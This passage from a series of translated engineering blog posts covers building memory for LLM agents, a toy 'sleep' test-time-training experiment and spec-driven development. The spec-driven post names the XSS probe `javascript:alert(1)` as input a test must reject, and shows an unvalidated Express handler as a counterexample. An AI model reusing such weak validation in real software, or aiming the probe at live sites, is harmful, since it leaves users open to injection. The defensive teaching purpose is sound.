    Naive timestamps are treated as UTC; `now` defaults to the current UTC time.
    """
    memory_dt = datetime.fromisoformat(memory_timestamp)
    if memory_dt.tzinfo is None:
        memory_dt = memory_dt.replace(tzinfo=timezone.utc)
    
    if now is None:
        now = datetime.now(timezone.utc)
    days_ago = (now - memory_dt).total_seconds() / 86400  # Convert to days
    
    return math.exp(-decay_rate * days_ago)

def score_and_rank_memories(
    memories: list[dict],
    semantic_weight: float = 0.7,
    recency_weight: float = 0.3,
    now: datetime | None = None
) -> list[dict]:
    """
    Rank memories by combining:
    - Semantic similarity score (from the vector search)
    - Recency score (time decay)
    
    semantic_weight + recency_weight should equal 1.0
    """
    if now is None:
        now = datetime.now(timezone.utc)
    scored = []
    
    for mem in memories:
        semantic_score = mem.get("score", 0.5)  # Score from the vector DB (higher = more similar)
        recency_score = compute_recency_weight(
            mem.get("timestamp", now.isoformat()),
            now=now
        )
        
        # Combined score
        final_score = (
            semantic_weight * semantic_score +
            recency_weight * recency_score
        )
        
        scored.append({
            **mem,
            "semantic_score": semantic_score,
            "recency_score": recency_score,
            "final_score": final_score
        })
    
    # Sort by final score, descending
    return sorted(scored, key=lambda x: x["final_score"], reverse=True)


# Usage example
raw_memories = [
    {
        "memory": "Uses Supabase for the database",
        "score": 0.85,
        "timestamp": "2026-01-15T10:00:00"  # About 5 months before "now": old
    },
    {
        "memory": "Just switched to PlanetScale",
        "score": 0.70,
        "timestamp": "2026-05-30T14:00:00"  # About 1 week before "now": recent
    },
    {
        "memory": "Prefers TypeScript strict mode",
        "score": 0.60,
        "timestamp": "2026-06-01T09:00:00"  # About 5 days before "now"
    }
]

# Pin "now" so the output is reproducible
ranked = score_and_rank_memories(
    raw_memories,
    now=datetime(2026, 6, 6, tzinfo=timezone.utc)
)
for mem in ranked:
    print(f"Score: {mem['final_score']:.3f} | {mem['memory']}")

# Output (with now = 2026-06-06 UTC):
# Score: 0.648 | Just switched to PlanetScale  ← recent + fairly relevant → top
# Score: 0.609 | Prefers TypeScript strict mode
# Score: 0.595 | Uses Supabase for the database  ← old, pushed down despite the highest semantic score
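
# Choosing decay_rate (illustrative helpers, not from any library):
# with weight = exp(-decay_rate * days), the weight halves every ln(2) / decay_rate days,
# so you can also pick a half-life first and derive decay_rate from it.
import math

def half_life_days(decay_rate: float) -> float:
    return math.log(2) / decay_rate

def decay_rate_for_half_life(days: float) -> float:
    return math.log(2) / days

print(f"{half_life_days(0.1):.2f}")           # 6.93
print(f"{decay_rate_for_half_life(30):.4f}")  # 0.0231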
</code></pre><p>This kind of weighting is one plausible reason why, when you say <em>"I just moved from Supabase to PlanetScale"</em>, ChatGPT uses the newest information instead of continuing to talk about Supabase.</p><hr><h1 id="9-privacy-controls-ng-b-qua-ph-n-n-y"><strong>9. Privacy Controls: don't skip this part</strong></h1><p>Many developers skip this part when building a memory system, yet it becomes critical once you go to production, especially when you have real users and real data.</p><figure class="kg-card kg-image-card"></figure><p><strong>API endpoints a memory system must have:</strong></p><pre><code class="language-python"># privacy_controls.py
from fastapi import FastAPI, HTTPException
from mem0 import Memory
from openai import OpenAI

app = FastAPI()
m = Memory.from_config(config)  # `config` is the Mem0 config from the earlier sections
openai_client = OpenAI()

# In production, also verify that the authenticated caller really is user_id

@app.get("/users/{user_id}/memories")
def list_memories(user_id: str):
    """
    [REQUIRED] Let users see all of their memories.
    GDPR Article 15: "right of access"
    """
    memories = m.get_all(user_id=user_id)
    return {
        "user_id": user_id,
        "total_count": len(memories["results"]),
        "memories": [
            {
                "id": mem["id"],
                "content": mem["memory"],
                "created_at": mem.get("created_at"),
                "updated_at": mem.get("updated_at")
            }
            for mem in memories["results"]
        ]
    }

@app.delete("/users/{user_id}/memories/{memory_id}")
def delete_memory(user_id: str, memory_id: str):
    """
    [REQUIRED] Delete one specific memory.
    GDPR Article 17: "right to erasure" ("right to be forgotten")
    """
    # Verify that the memory belongs to this user before deleting it
    all_mems = m.get_all(user_id=user_id)
    memory_ids = [mem["id"] for mem in all_mems["results"]]
    
    if memory_id not in memory_ids:
        raise HTTPException(404, "Memory not found for this user")
    
    m.delete(memory_id=memory_id)
    return {"message": f"Memory {memory_id} deleted successfully"}

@app.delete("/users/{user_id}/memories")
def delete_all_memories(user_id: str):
    """
    [REQUIRED] Delete all memories: "Reset memory".
    Critical for privacy compliance.
    """
    m.delete_all(user_id=user_id)
    return {"message": f"All memories for user {user_id} deleted"}

@app.post("/chat/temporary")
def chat_temporary(message: str):
    """
    [RECOMMENDED] Chat that stores nothing: Temporary/Incognito mode.
    For when the user doesn't want the AI to remember this conversation.
    """
    response = openai_client.chat.completions.create(
        model="gpt-4o",
        messages=[{"role": "user", "content": message}]
        # Do NOT call m.add() here
        # Do NOT save anything to the session history
    )
    return {"response": response.choices[0].message.content}
</code></pre><p><strong>Data minimization: what you must NOT store:</strong></p><pre><code class="language-python"># data_sanitizer.py
import re

# Order matters: more specific patterns run first, so a phone number is not
# half-matched by the broader ID-number pattern. This is best-effort, not a guarantee.
SENSITIVE_PATTERNS = [
    r'\b\d{3}-\d{2}-\d{4}\b',                               # SSN (US)
    r'\b(?:\d{4}[\s-]?){3}\d{4}\b',                         # Credit card
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b',  # Email
    r'(?:\+84|\b0)\d{9,10}\b',                              # Vietnamese phone number
    r'\b\d{9,12}\b',                                        # Vietnamese ID number (CMND: 9 digits, CCCD: 12 digits)
]

def sanitize_before_storing(text: str) -> str:
    """
    Remove sensitive information before saving it to memory.
    Always run this function before calling m.add().
    """
    for pattern in SENSITIVE_PATTERNS:
        text = re.sub(pattern, "[REDACTED]", text)
    return text

# Usage (user_message, user_id and the Mem0 instance m come from the earlier examples)
safe_content = sanitize_before_storing(user_message)
m.add([{"role": "user", "content": safe_content}], user_id=user_id)
</code></pre><hr><h1 id="10-memgpt-letta-khi-b-n-mu-n-i-s-u-h-n-n-a"><strong>10. MemGPT / Letta: when you want to go deeper</strong></h1><p>This is a bonus section for those who want to understand more sophisticated memory architectures.</p><p><strong>MemGPT</strong> (now <strong>Letta</strong>) takes a very different approach. Instead of memory being injected into the prompt from the outside, Letta lets the <strong>LLM decide for itself</strong> when to read or write memory.</p><p>Think of it this way:</p><blockquote>If a typical memory system is like a nurse preparing the patient's file for the doctor in advance, MemGPT is like a doctor who can <strong>open the records drawer at any time</strong> during the examination and decide on their own when to look up older information.</blockquote><pre><code class="language-python"># Basic Letta client
# Note: the Letta Python SDK has changed across releases; this snippet follows the
# older create_client() style and may need adapting to the version you install.
from letta import create_client

client = create_client()

# Create an agent with memory capabilities
agent = client.create_agent(
    name="memory_agent",
    memory_blocks=[
        {
            "label": "human",  # Memories about the user
            "value": "The user is a backend developer building an HR SaaS",
            "limit": 2000  # Character limit for this memory block
        },
        {
            "label": "persona",  # The agent's personality
            "value": "I am a smart AI assistant that always remembers context",
            "limit": 1000
        }
    ],
    tools=["archival_memory_insert", "archival_memory_search"]
    # The agent can call these tools on its own to read/write long-term memory
)

# Chat with the agent: it manages its own memory
response = client.send_message(
    agent_id=agent.id,
    message="What's the best way to optimize Postgres queries?",
    role="user"
)
print(response.messages[-1].text)
</code></pre><p><strong>Key differences of MemGPT:</strong></p><ul><li><strong>OS-inspired paging</strong>: the LLM has a "main context" (like RAM) and "archival storage" (like disk). When the main context fills up, the LLM itself decides what to "swap out" to archival storage</li><li><strong>Self-directed retrieval</strong>: the LLM actively searches archival memory when it needs to, instead of the system injecting memories automatically</li><li><strong>Function calling</strong>: memory is read and written through tool calls, which creates a more complex reasoning loop</li></ul><p>Letta suits use cases that need <strong>long-horizon reasoning</strong>, where the agent has to remember and connect information across many different sessions.</p><hr><h1 id="11-b-i-h-c-kinh-nghi-m"><strong>11. Lessons learned</strong></h1><p>I tried building a memory system for my team's internal chatbot and learned quite a lot, the painful way.</p><p><strong>Lesson 1: Context window budget. Don't be greedy</strong></p><p>In my first build, I stuffed every related memory into the prompt. The result: the model was overloaded with context, response quality dropped noticeably, and it even hallucinated when it had to "read" too much at once.</p><p>Solution: a <strong>hard limit of 5–7 memories at most</strong>, combined with a relevance threshold (only memories with score > 0.7). Fewer memories, but much better quality.</p><p><strong>Lesson 2: Conflict resolution is mandatory, not optional</strong></p><p>Users change tech stacks, jobs, and projects, and this happens more often than I expected. 
Without conflict resolution, the agent will say contradictory things and lose the user's trust.</p><p>Solution: use Mem0 (it handles deduplication and conflicts better than building your own from scratch), or, if you do build your own, implement a "supersede" mechanism: when a new memory on the same topic arrives, mark the old one as deprecated.</p><p><strong>Lesson 3: Storing more ≠ remembering better</strong></p><p>At first I stored everything, including casual questions and conversations with no value. The result: the vector DB filled up with "junk", and retrieval quality dropped because of the many irrelevant results.</p><p>Solution: implement a <strong>memory worthiness filter</strong>: before saving, check whether the memory is valuable enough to keep long-term. A simple heuristic: only store preferences, facts, and decisions, not small talk.</p><pre><code class="language-python">def is_worth_storing(content: str) -> bool:
    """
    A simple heuristic filter to run before storing.
    In production, an LLM classifier is more accurate.
    """
    # Too short: probably no lasting value
    if len(content.split()) < 5:
        return False
    
    # Indicators of a valuable memory (preferences, facts, decisions)
    valuable_keywords = [
        "using", "like", "don't like", "prefer", "building",
        "project", "stack", "framework", "database", "deploy", "team",
        "requirement", "constraint", "goal", "objective"
    ]
    
    content_lower = content.lower()
    keyword_count = sum(1 for kw in valuable_keywords if kw in content_lower)
    
    return keyword_count >= 1  # At least one valuable keyword
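
# A minimal sketch of the "supersede" mechanism described above for self-built systems.
# Everything here (MemoryRecord, MemoryStore, the topic field) is hypothetical:
# a new memory on the same topic marks older active ones as deprecated instead of
# deleting them, so the history is kept but only the latest fact reaches the prompt.
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class MemoryRecord:
    content: str
    topic: str
    created_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc))
    deprecated: bool = False

class MemoryStore:
    def __init__(self) -> None:
        self.records: list[MemoryRecord] = []

    def add(self, content: str, topic: str) -> MemoryRecord:
        # Supersede: deprecate every active record that shares the topic
        for rec in self.records:
            if rec.topic == topic and not rec.deprecated:
                rec.deprecated = True
        new_record = MemoryRecord(content=content, topic=topic)
        self.records.append(new_record)
        return new_record

    def active(self) -> list[str]:
        # Only non-deprecated memories should be injected into the prompt
        return [rec.content for rec in self.records if not rec.deprecated]

store = MemoryStore()
store.add("Uses Supabase for the database", topic="database")
store.add("Prefers TypeScript strict mode", topic="language")
store.add("Switched to PlanetScale", topic="database")
print(store.active())
# ['Prefers TypeScript strict mode', 'Switched to PlanetScale']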
</code></pre><p><strong>Lesson 4: Privacy must be a first-class citizen</strong></p><p>Only when I added real users to testing did I realize there was no way for them to delete their memories, and I had to refactor quite a lot. Since then, I always design privacy controls <strong>before</strong> coding the memory feature.</p><hr><h1 id="k-t-lu-n"><strong>Conclusion</strong></h1><p>To sum up what we covered:</p><ul><li>ChatGPT "remembers" by inserting memory context into the system prompt before each request: not true memory, but it works nearly as well in practice</li><li>There are <strong>4 types of memory</strong>, each with its own lifecycle and storage: Profile, Episodic, Extracted Knowledge, and Active Context</li><li><strong>A 4-layer architecture</strong>: UI → Processing Engine → Storage → LLM Integration</li><li>Building a memory system isn't hard: start with <strong>Chroma + Mem0</strong> for a prototype, then scale up to <strong>Pinecone</strong> for production</li><li><strong>Recency + relevance scoring</strong> is the key to choosing which memories go into the context</li><li><strong>Privacy controls</strong> are mandatory, not optional: visibility, deletion, temporary mode</li><li><strong>MemGPT/Letta</strong> if you want to go deeper into self-directed memory management</li></ul><p>If you're building an AI agent and want it to get "smarter" over time and remember users the way a real friend would, a memory system is the missing piece.</p><p><strong>References:</strong></p><ul><li><a href="https://agentman.ai/blog/reverse-ngineering-latest-ChatGPT-memory-feature-and-building-your-own">Agentman: Reverse Engineering ChatGPT Memory</a></li><li><a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/">How ChatGPT Memory Works (Embrace The Red)</a></li><li><a href="https://docs.mem0.ai/">Mem0 Official Documentation</a></li><li><a href="https://help.openai.com/en/articles/8590148-memory-faq">OpenAI Memory FAQ</a></li><li><a 
href="https://sparkco.ai/blog/pinecone-vs-weaviate-vs-chroma-a-deep-dive-into-vector-dbs">Pinecone vs Weaviate vs Chroma Deep Dive</a></li><li><a href="https://docs.letta.com/">Letta (MemGPT) Documentation</a></li><li><a href="https://docs.trychroma.com/">ChromaDB Documentation</a></li></ul>
</article>
<article>
<h1>The Paradox of the 24/7 Machine: Can "Sleep" Make AI Smarter?</h1>
<p>Nguyen Trung duc — Wed, 24 Jun 2026 12:32:18 GMT</p>
<p>Hi everyone,</p><p>One of the biggest reasons the world is shifting to Artificial Intelligence (AI) is its ability to run without limit. While humans can only work effectively for 8 to 10 hours a day and must spend a third of their lives asleep to recover, AI can run 24/7 without a minute of rest. We take it for granted that machines never get tired, and that making them process millions of instructions nonstop is only natural.</p><p>But from an engineering standpoint, have you ever wondered: <strong>"Does a large language model need to sleep? And if we let it rest, would it actually work better?"</strong></p><p>The question sounds a bit tongue-in-cheek, but it may hold the answer to one of the toughest problems in the AI industry today: <strong>processing ultra-long context (Long-Context)</strong>. AI doesn't get tired biologically, but it is being "drained" in terms of hardware resources. Today, let's explore a rather unusual architectural idea together: letting AI "sleep" to rescue our overloaded memory.</p><h2 id="1-b-n-ch-t-k-thu-t-t-i-sao-ai-c-ng-c-y-l-u-c-ng-ki-t-s-c">1. The technical root cause: why does AI get more "exhausted" the longer it runs?</h2><p>To understand why AI starts to "lose it" in long chats, we have to expose the weak spot buried deep in the Transformer architecture: <strong>the KV Cache (Key-Value cache)</strong>.</p><p>Think of the KV Cache as Claude's <strong>notepad</strong>. When you make it read an entire codebase or a very long system log, it has to keep the key and value vectors of every token it has read in this notepad so that its next answer stays on topic. For developers, this "stubborn" storage mechanism puts two heavy weights on the system:</p><ul><li><strong>VRAM balloons dramatically:</strong> The more new tokens you feed in, the thicker the KV Cache "notepad" gets. 
When processing ultra-long texts, this cache grows enormous and can even exceed the size of the model's own weights. That leads to the error that haunts everyone: <strong>Out of Memory (OOM)</strong>, and the GPU job crashes!</li><li><strong>Compute grows quadratically ($O(n^2)$):</strong> Each new token must attend to every token that came before it, so the work per generated token grows linearly with the context length $n$, and the total attention work over the whole sequence grows as $O(n^2)$. The longer the context, the heavier the computation. That's why an AI answers very quickly at first but gets slower and slower as the conversation goes on.</li></ul><p>Until now, we have mostly handled this problem with stopgap measures such as:</p><ul><li>Upgrading the hardware (burning money on more GPUs).</li><li>Cutting old context (Truncation) $\rightarrow$ accepting that the AI loses its "short-term memory".</li><li>Using a Sliding Window.</li></ul><p>But none of these solve the root problem when high consistency is required. It's just like trying to keep 500 Chrome tabs open at once while you work; the system will inevitably choke and run out of RAM.</p><p>This raises a completely new architectural idea: <strong>Instead of trying to keep those 500 tabs running and overflowing the RAM, why not let the system pause temporarily, while packaging and compressing the core information into a more durable form of memory?</strong></p><p>That's when we tell the AI: <strong>"Time to go to sleep!"</strong></p><h2 id="2-c-ch-ng-chuy-n-h-a-k-c-ng-n-h-n-th-nh-tr-ng-s-ph-n-ng-nhanh">2. The "sleep" mechanism: turning short-term memories into "fast weights"</h2><p>To tackle this bottleneck, researchers have borrowed a biological mechanism from the human brain: <strong>Memory Consolidation</strong>. When we sleep, the brain transfers short-term memories from the Hippocampus to the Neocortex for long-term storage. 
</p><p>In the architectural proposals currently being explored in research, the AI's operating cycle is split into two states: <strong>Awake</strong> and <strong>Asleep</strong>.</p><pre><code>     ☀️ AWAKE STATE (Online Phase)
 └── Chat with the user
 └── Minimal KV Cache (only the last few turns)
 └── Fast token generation at a constant rate
       │
       ▼ (When the system goes idle)
       │
 💤 SLEEP STATE (Offline Phase)
 └── Replay the old KV Cache and "digest" it in the background with Gradient Descent
 └── Compress the information into the Fast Weights matrix
 └── Flush Cache: clear 100% of the scratch data from VRAM
</code></pre><h3 id="-tr-ng-th-i-th-c-online-inference-phase-">☀️ Awake state (Online Inference Phase)</h3><p>When interacting with users, the AI works with an extremely small cache window (KV Cache). It only keeps the short-lived information of the last few turns. Because this "notepad" always stays minimal, the model's processing and token-generation speed stays stable, which in principle removes the "the longer you chat, the slower it gets" problem.</p><h3 id="-tr-ng-th-i-ng-offline-recurrence-phase-">💤 Sleep state (Offline Recurrence Phase)</h3><p>When you stop typing, the system goes idle and "Sleep" mode kicks in immediately. This is not a passive shutdown but a very active background computation:</p><ul><li><strong>Local Optimization:</strong> The AI pulls out all the old conversation data in the KV Cache and runs a local optimization loop for some $N$ iterations, using Gradient Descent to "engrave" this information directly into a special weight matrix called <strong>Fast Weights</strong>.</li><li><strong>Flush Cache:</strong> As soon as the data has been successfully "fossilized" into the Fast Weights, the system immediately <strong>clears the KV Cache from VRAM</strong>.</li></ul><blockquote><strong>The essence of "sleep":</strong> We accept spending GPU resources while idle (offline) in exchange for reclaiming all the VRAM the cache was using, and for fast processing when the AI "wakes up" to take on a new task.</blockquote><p>A key advantage of this mechanism is that it addresses <strong>Interference</strong>. In conventional models, when you cram in very long sequences, memory vectors overlap and the AI mixes up information. 
Running the optimization loop during "sleep" can help the model realign and orthogonalize these vectors, neatly filing short-term memories into separate "drawers" in the long-term weight matrix.</p><h2 id="3-th-c-nghi-m-gi-i-ng-test-time-training-ttt-">3. Experiment: Test-Time Training (TTT) demystified</h2><p>To make the "sleep to compress memory" idea easier to picture, I built a very lean demo on <strong>a modest 8GB-RAM machine at home</strong>, using a model with only 480 parameters, to solve the following problem.</p><h3 id="b-i-to-n">The problem</h3><p>The AI has to find the hidden logic of a system by looking at context data with 20% noise: one in every five pieces of information is junk. Picture reading a codebase where one in five comments misleads you, or a log file where 20% of the entries are corrupt: <strong>can the AI extract the truth?</strong></p><p>Mathematically, the compressed memory is parameterized by two low-rank factors $U$ and $V$ (thin matrices with only a few columns), so their product $U V^{\top}$ has low rank:</p><p>$$W = \text{softmax}(U V^{\top})$$</p><p>The test scenario runs in three steps:</p><ul><li><strong>Step 1: Learn the rules (Pre-training):</strong> Let the AI read clean data so it can derive prior knowledge about how the system generally works. At this point the AI doesn't yet know the specifics of the system under test; it only grasps the general principles.</li><li><strong>Step 2: Load a dirty context:</strong> Give the AI a real context seeded with 20% misleading noise (bad log lines, junk code). At this point the AI is completely in the dark about which lines are real and which are fake.</li><li><strong>Step 3: Sleep (Test-Time Training, TTT):</strong> Let the AI "nap" for $K$ steps. 
While it sleeps, the AI runs Gradient Descent so that the parameters $U$ and $V$ adjust themselves and filter out the noise read in Step 2.</li></ul><h3 id="k-t-qu-thu-c-sau-gi-c-ng-">Results after "sleep"</h3><p>After letting the model sleep for different durations $K$, these are the accuracy benchmark scores I actually measured:</p><figure class="kg-card kg-image-card"></figure><p>The curve is <strong>monotonically increasing</strong> across all 3000 steps, with no oscillation and no dips, which fits the idea that "the deeper the sleep, the clearer the mind".</p><h3 id="3-b-i-h-c-x-ng-m-u-b-c-t-ch-t-b-ng-i-m">3 hard-won lessons from the scores</h3><ul><li><strong>First, the prior is extremely valuable:</strong> At $K=0$ (no sleep at all), the AI already reaches 10% accuracy, 3 times better than random guessing. It has not processed the new context yet, but knowing the general structure of the system in advance already makes it far less confused.</li><li><strong>Second, more sleep helps, but it saturates:</strong> From $K=0$ to $K=500$ the score rises very quickly. After $K=500$ the gains slow down, and a lot more sleep only adds a few points. This mirrors our own biology: the first sleep cycles bring the most recovery, and each additional cycle brings less.</li><li><strong>Third, the result that matters most:</strong> with very deep sleep at $K=3000$, accuracy (53%) <strong>overtakes</strong> reading the raw observations directly (49%).</li></ul><p>The compressed structure, combined with the prior acting as an anchor, forms a natural filter. It makes the AI ignore "odd" information that does not fit the logic of the system, so much of the noise is suppressed during the background optimization while it sleeps.</p><h3 id="v-y-b-n-demo-n-y-th-c-ngh-a-g-">So what does this demo mean?</h3><p>This demo clearly does not turn AI into a god. 
The 4-percentage-point gain over reading the raw data (53% vs 49%) sounds modest.<br>Its real value is that it demonstrates, at toy scale, a concrete and reproducible mechanism:</p><blockquote><em>When memory is compressed into a low-rank structure and the model is allowed to keep optimizing in the background at inference time (Test-Time Training), it can filter noise using its prior knowledge and end up more accurate than the raw data.</em></blockquote><p>Scale this 480-parameter demo up to the 480-billion-parameter models of the future, and this may well be a core piece of the answer to the question: why would an LLM need real "sleep"?</p><h2 id="k-t-lu-n-t-duy-qu-n-l-chu-k-sinh-h-c-c-a-ai">Conclusion: Managing an AI's "Biological Cycle"</h2><p>Moving from cramming ever more data into the KV Cache to "letting the AI sleep so it compresses its own memory" is clearly a significant step. It opens up a new way of thinking about system optimization, especially on resource-constrained hardware (Local AI / Edge Devices).</p><p>However, let's be frank: <strong>this architecture is still a lab experiment</strong>. You cannot yet grab a plug-and-play library from GitHub and bolt this TTT mechanism onto Llama 3 or GPT-4. Training Fast Weights on models with billions of parameters without damaging their underlying knowledge is still a hard problem that researchers are working on.</p><p>Although it will not reach production projects any time soon, it suggests a very valuable system-design idea: <strong>a neural network can manage, clean up, and optimize its own data structures during rest periods.</strong></p><p>The era of running hardware flat out 24/7 may be coming to an end. Sometimes, knowing when to stop and "take a nap" is the best way to go further, right?</p>
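<p>To make the Sleep phase described above more concrete, here is a toy sketch in plain JavaScript. It is not the author's 480-parameter demo, and it leaves out the low-rank <code>softmax(U × V^T)</code> structure. It only shows the two moves of the Sleep phase: writing the pairs held in a KV cache into a fast-weight matrix <code>W</code> with N gradient-descent steps on the squared recall error ½‖Wk − v‖², then flushing the cache. The helper names, the 3-dimensional vectors, the step count and the learning rate are all assumptions chosen for illustration.</p>
<pre><code class="language-javascript">// Toy "sleep" step (hypothetical sketch, not the author's demo):
// consolidate KV-cache pairs into a fast-weight matrix W via gradient descent,
// then flush the cache.

// Matrix-vector product: W (rows x cols) times x (length cols)
function matVec(W, x) {
  return W.map((row) => row.reduce((sum, w, j) => sum + w * x[j], 0));
}

// Run `steps` passes of gradient descent on 0.5 * ||W k - v||^2 for every
// cached (key, value) pair, then empty the cache in place.
function consolidate(W, cache, steps, lr) {
  for (let t = 0; t < steps; t++) {
    for (const { key, value } of cache) {
      const pred = matVec(W, key);
      // The gradient w.r.t. W is the outer product (W k - v) k^T
      for (let i = 0; i < W.length; i++) {
        const err = pred[i] - value[i];
        for (let j = 0; j < key.length; j++) {
          W[i][j] -= lr * err * key[j];
        }
      }
    }
  }
  cache.length = 0; // "Flush cache": the raw pairs are gone, only W remains
  return W;
}

// Usage: two orthogonal keys, so the stored memories do not interfere.
const fastW = Array.from({ length: 3 }, () => [0, 0, 0]);
const kvCache = [
  { key: [1, 0, 0], value: [0, 1, 0] },
  { key: [0, 1, 0], value: [0, 0, 1] },
];
consolidate(fastW, kvCache, 50, 0.5);
console.log(matVec(fastW, [1, 0, 0]).map((x) => x.toFixed(3)), kvCache.length);
</code></pre>
<p>With orthogonal keys, each memory lands in its own column of <code>W</code>, which echoes the "separate drawers" picture from the Interference paragraph.</p>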
</article>
<article>
<h1>Spec-Driven Development: When the Spec Becomes the "Source Code" of the AI Era</h1>
<p>N.Đ.T — Wed, 24 Jun 2026 08:26:04 GMT</p>
<p>AI can write code extremely fast, but speed is not the same as understanding the requirements correctly. With a slightly vague prompt, the same problem can produce many different implementations, each with its own set of holes.</p><p>Spec-Driven Development (SDD) exists to tackle exactly that problem. Instead of letting the AI guess, SDD makes the spec a mandatory anchor for the whole development process. This is also why many people find that “vibe coding” no longer fits professional work.</p><h2 id="1-vibe-coding-h-ng-u">1. Where vibe coding breaks down</h2><p>Picture a very familiar situation.</p><p>You ask an AI to quickly build a bookmark management API with a prompt like:</p><blockquote>“Build me a bookmark CRUD with basic validation.”</blockquote><p>A few seconds later, the AI returns an Express project that runs fine. The demo looks good, the endpoints work, everything seems perfect. You merge.</p><p>Two weeks later:</p><ul><li>Someone pastes <code>javascript:alert(1)</code> into the URL field, and the system still saves it.</li><li>A user creates the same URL several times, and the database fills up with duplicates.</li><li>The delete-bookmark API accepts an arbitrary <code>id</code> and happily deletes other people's bookmarks.</li><li>No pagination.</li><li>No separation between business logic and the controller.</li><li>Whatever the identity header says is trusted.</li></ul><p>The problem is not that “the AI is dumb” or that “the dev was careless”.</p><p>The problem is: <strong>nothing clearly defines how the system must behave</strong>.</p><p>Without a spec, every decision becomes improvisation, and that improvisation is exactly where bugs and security issues come from.</p><h2 id="2-sdd-l-g-">2. What is SDD?</h2><p>SDD can be summed up in one sentence:</p><blockquote>In SDD, the spec is the source of truth. 
Code is just the implementation generated from the spec.</blockquote><p>When requirements change, you update the spec first and then the code, never the other way around.</p><p>SDD is usually split into three levels of strictness:</p><h3 id="spec-first">Spec-first</h3><p>The spec only guides the first implementation. After that, it may drift over time.</p><p>Suitable for prototypes or short-lived projects.</p><h3 id="spec-anchored">Spec-anchored</h3><p>Spec and code must always stay in sync. Every behavior change requires updating both sides, and CI checks for drift.</p><p>This is the right level for most production systems.</p><h3 id="spec-as-source">Spec-as-source</h3><p>Humans only edit the spec; the code is generated fully automatically.</p><p>This model only really fits a few narrow domains, such as automotive or OpenAPI stub generation.</p><hr><p>When is SDD worth the investment?</p><ul><li>Large teams, or teams with frequent turnover</li><li>AI assistants in the workflow</li><li>Systems that require audit or compliance</li><li>Many services developed in parallel</li></ul><p>Conversely, for a throwaway prototype, a small bug fix, or a simple CRUD you can explain in under a minute, SDD is usually overkill.</p><p>The rule of thumb is simple:</p><blockquote>Use the minimum rigor that is still enough to remove ambiguity.</blockquote><h2 id="3-b-n-l-p-gi-ai-i-ng-spec">3. Four layers that keep the AI on spec</h2><p>To keep the spec from turning into “documentation written for the sake of it”, SDD usually organizes it into four layers.</p><p>Let's return to the bookmark example above.</p><h3 id="l-p-1-constitution-hi-n-ph-p-d-n-">Layer 1: Constitution (the project's charter)</h3><p>This is a set of invariant rules that applies to the entire project.</p><p>For example:</p><ul><li>TypeScript must have <code>strict</code> enabled, and <code>any</code> is forbidden</li><li>Every mutation from the web app must go through the API layer</li><li>URL input must match <code>^https?://</code></li><li>Never render raw HTML from user input</li></ul><p>The constitution is not a guideline. 
It is a mandatory rule.</p><p>If the constitution changes, every related spec must be re-validated.</p><hr><h3 id="l-p-2-spec">Layer 2: Spec</h3><p>The spec only describes:</p><ul><li>WHAT</li><li>WHY</li></ul><p>It never talks about the tech stack.</p><p>The most important part of a spec is its Acceptance Criteria (AC).</p><p>For example:</p><ul><li>AC-2: A URL using the <code>javascript:</code> or <code>data:</code> scheme must return <code>400 URL_SCHEME_INVALID</code></li><li>AC-5: A user cannot create a duplicate bookmark</li><li>AC-7: Deleting someone else's bookmark must return <code>404</code> instead of <code>403</code>, so the response does not leak the fact that the resource exists</li></ul><p>Each AC must be something a test can verify.</p><p>Not a subjective description such as:</p><blockquote>“Reasonable validation”</blockquote><hr><h3 id="l-p-3-plan-v-tasks">Layer 3: Plan and Tasks</h3><p>This is where HOW finally comes in.</p><p>The plan decides:</p><ul><li>Architecture</li><li>Tech stack</li><li>Database schema</li><li>API contract</li><li>Data flow</li></ul><p>Tasks then break the implementation into steps with explicit dependencies.</p><hr><h3 id="l-p-4-test">Layer 4: Test</h3><p>Every AC must map to at least one automated test.</p><p>For example, AC-2 gets a test that:</p><ul><li>POSTs <code>javascript:alert(1)</code></li><li>Expects <code>400</code></li><li>Expects the error code <code>URL_SCHEME_INVALID</code></li></ul><p>If an AC has no corresponding test, the merge is blocked.</p><hr><p>The most important property here is traceability.</p><p>Any line of code can be traced back along:</p><p>Code → AC → Constitution</p><h2 id="4-c-ng-m-t-field-hai-th-gi-i">4. Same field, two worlds</h2><p>In vibe coding, validation for the <code>url</code> field is often just:</p><pre><code class="language-js">if (!url) {
  return res.status(400).json({ message: 'url is required' });
}

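// No scheme check, no length limit, no duplicate check, no ownership check
bookmarks.push({
  id: nextId++,
  url,
  title,
  tags,
  userId,
  createdAt: new Date().toISOString(),
});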
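</code></pre><p>In SDD, the same field might look like this:</p><pre><code class="language-ts">import { IsString, Matches, MaxLength } from 'class-validator';
import { Transform } from 'class-transformer';

// The DTO name is illustrative
export class CreateBookmarkDto {
  @IsString()
  @MaxLength(2048, { message: 'URL_TOO_LONG' })
  @Matches(/^https?:\/\//i, { message: 'URL_SCHEME_INVALID' })
  @Transform(({ value }) =>
    typeof value === 'string' ? value.trim() : value,
  )
  url!: string;
}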
</code></pre><p>The difference is not the number of decorators.</p><p>The difference is that <strong>every line has a reason to exist</strong>.</p><ul><li><code>@MaxLength(2048)</code> comes from an acceptance criterion on URL length</li><li>The scheme-validation regex comes from a security rule in the constitution</li><li><code>@Transform</code> handles an edge case described in the spec</li><li>The error codes are kept in sync with the frontend contract</li></ul><p>That is the core of SDD.</p><p>It is not “stricter code”, but rather:</p><blockquote>Every decision in the code has a spec standing behind it.</blockquote><p>When a requirement changes, you know exactly:</p><ul><li>what needs to change</li><li>which tests will fail</li><li>how far the impact reaches</li></ul><h2 id="5-workflow-th-c-t-v-i-claude-code">5. A real workflow with Claude Code</h2><p>GitHub Spec-Kit currently packages the SDD workflow as a fairly complete chain of slash commands.</p><p>For example, with Claude Code:</p><h3 id="1-speckit-constitution">1. <code>/speckit.constitution</code></h3><p>Creates or updates the constitution.</p><p>Usually done once, and rarely changed afterwards.</p><h3 id="2-speckit-specify">2. <code>/speckit.specify</code></h3><p>Describes the WHAT and WHY of a feature.</p><p>No tech stack.</p><h3 id="3-speckit-clarify">3. <code>/speckit.clarify</code></h3><p>Claude proactively asks about whatever is still ambiguous before implementation is allowed.</p><p>This step is extremely important.</p><p>It forces the requirements to be clear from the start.</p><h3 id="4-speckit-plan">4. <code>/speckit.plan</code></h3><p>Only now does the discussion turn to:</p><ul><li>architecture</li><li>schema</li><li>API contract</li><li>infra</li><li>implementation strategy</li></ul><h3 id="5-speckit-tasks">5. 